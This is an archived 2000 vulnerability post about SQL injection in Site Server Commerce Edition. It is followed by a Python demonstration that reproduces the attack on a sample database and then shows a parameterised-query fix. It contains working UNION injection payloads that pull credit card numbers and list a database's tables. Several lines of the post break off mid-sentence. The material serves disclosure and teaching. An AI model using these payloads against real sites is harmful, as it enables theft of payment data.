BID 994, MS00-010 (Site Server Commerce Edition non-validated SQL inputs)
From: bgreenbaum () SECURITYFOCUS COM (Ben Greenbaum)
Date: Fri, 25 Feb 2000 09:11:17 -0800
Forwarded to the list from a contributor who wishes to remain anonymous:
-----Begin Forwarded Message-----
The link from one page to another is
Within product.asp dept_id is picked up and used to construct a SQL
"select a,b,c,d,e,f,g from table where dept_id = " & Request("Dept_ID")
Further down the page a, b, c, d, e, f and g are response.writed to the
Think about what happens if the URL above is modified to
http://hostname/product.asp?dept_id=100000 union select
credit_card_number,null,null,null,null,null, null from Credit_Card_table
If a bogus dept_id is used, the second unioned statement returns a result
set in its place and gets displayed on the page!!
I know this is possible on a number of large commercial sites.
The interesting fact is that this is just within a dodgy piece of code
produced by Site Server. The same technique is viable for any database
accessing ASP that uses parameters from either GET or POST.
No special tools are needed; this can be done by direct typing in the
The implications, like being able to loop through the sysobjects table to
get a complete table structure of a database, etc., are frightening.
-----End Forwarded Message-----
This is a known issue with several web applications that use an SQL
database. More information on this particular case, including patch
locations, is available at:
Director of Site Content
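The UNION trick the forwarded message describes, worked through as an added example (not code from the post or from Site Server): the product page's seven-column SELECT is rebuilt with string concatenation exactly as the ASP line does it, the contributor's dept_id payload is fed to it, and a parameterised version is shown beside it. Everything here is constructed: the table layout, the two test card numbers, and the choice of sqlite3 so that it runs offline; SQLite's sqlite_master catalogue stands in for the SQL Server sysobjects table the message mentions.

```python
import sqlite3


def build_db():
    """Constructed sample schema: a products table with the seven columns the
    page displays plus a dept_id filter, and a separate card table. The card
    numbers are standard test values, not real cards."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table products (
            dept_id integer, name text, price real, sku text,
            description text, weight real, stock integer, image_url text);
        create table Credit_Card_table (credit_card_number text, holder text);
        insert into products values
            (1, 'Widget', 9.99, 'W-1', 'A widget', 0.5, 10, 'w.png'),
            (2, 'Gadget', 19.99, 'G-1', 'A gadget', 1.0, 3, 'g.png');
        insert into Credit_Card_table values
            ('4111111111111111', 'alice'), ('5500000000000004', 'bob');
    """)
    return db


def product_rows_vulnerable(db, dept_id_param):
    """Mirrors the ASP line
       "select a,b,c,d,e,f,g from table where dept_id = " & Request("Dept_ID")
    The request value is pasted straight into the SQL text."""
    sql = ("select name, price, sku, description, weight, stock, image_url "
           "from products where dept_id = " + dept_id_param)
    return db.execute(sql).fetchall()


def product_rows_fixed(db, dept_id_param):
    """Same query with the value validated as an integer and bound as a
    parameter, so the request value can never become SQL syntax."""
    dept_id = int(dept_id_param)  # ValueError for anything but an integer
    sql = ("select name, price, sku, description, weight, stock, image_url "
           "from products where dept_id = ?")
    return db.execute(sql, (dept_id,)).fetchall()


# The contributor's payload: a dept_id that matches no row, followed by a
# UNION whose column count (seven) matches the original SELECT, so the card
# numbers land in the first displayed column.
CARD_PAYLOAD = ("100000 union select credit_card_number,null,null,null,null,"
                "null,null from Credit_Card_table")

# The "loop through sysobjects" idea from the message; sqlite_master is the
# SQLite equivalent (assumption: a real target would query sysobjects).
TABLE_PAYLOAD = ("100000 union select name,null,null,null,null,null,null "
                 "from sqlite_master where type='table'")


def first_column(rows):
    return sorted(r[0] for r in rows)


def demo():
    db = build_db()
    cards = first_column(product_rows_vulnerable(db, CARD_PAYLOAD))
    tables = first_column(product_rows_vulnerable(db, TABLE_PAYLOAD))
    try:
        product_rows_fixed(db, CARD_PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return cards, tables, blocked


if __name__ == "__main__":
    cards, tables, blocked = demo()
    print("leaked via union:", cards)
    print("tables via union:", tables)
    print("fixed version rejected payload:", blocked)
```

The two things to check on any page of this shape are the ones the payload depends on: the number of columns in the UNIONed SELECT must equal the original's (pad with null), and the first WHERE clause must match nothing so only the attacker's rows are rendered. Binding the value as a parameter removes both levers; the int() check is there because a department id has no business being anything else.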